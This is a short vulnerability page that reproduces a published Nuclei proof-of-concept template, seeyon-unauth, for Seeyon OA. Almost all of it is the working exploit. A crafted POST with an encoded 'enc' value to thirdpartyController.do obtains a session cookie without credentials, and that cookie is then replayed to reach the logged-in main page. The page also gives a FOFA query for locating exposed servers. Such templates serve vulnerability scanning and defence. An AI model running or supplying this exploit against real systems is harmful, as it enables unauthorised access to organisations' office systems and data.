漏洞描述
Seeyon is vulnerable to unauthorised access.
seeyon-unauth: Seeyon Unauthorised Access
PoC代码[已公开]
id: seeyon-unauth
info:
name: Seeyon Unauthorised Access
author: pikpikcu
severity: high
description: Seeyon is vulnerable to unauthorised access.
reference:
- https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg
- https://github.com/chaitin/xray/blob/f90cf321bc4d294bbf6625a9c4853f3bfdf0a384/pocs/seeyon-oa-cookie-leak.yml
metadata:
verified: true
max-request: 2
fofa-query: app="致远互联-OA"
tags: misconfig,seeyon,unauth,vuln
http:
- raw:
- |
POST /seeyon/thirdpartyController.do HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: deflate
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
- |
GET /seeyon/main.do HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Cookie: {{session}}
extractors:
- type: regex
name: session
part: header
internal: true
regex:
- 'JSESSIONID=(.*)'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "当前已登录了一个用户,同一窗口中不能登录多个用户"
- "<a href='/seeyon/main.do?method=logout'"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100f521f4c294560dd1156d9c330c15b23b73d1b2ea9cde0e97b7540a65caeb547c0220510cb25b54ab2b2ee9151486efd4c2b2c5407ea868b0a4aa41802a84697a7095:922c64590222798bb761d5b6d8e72950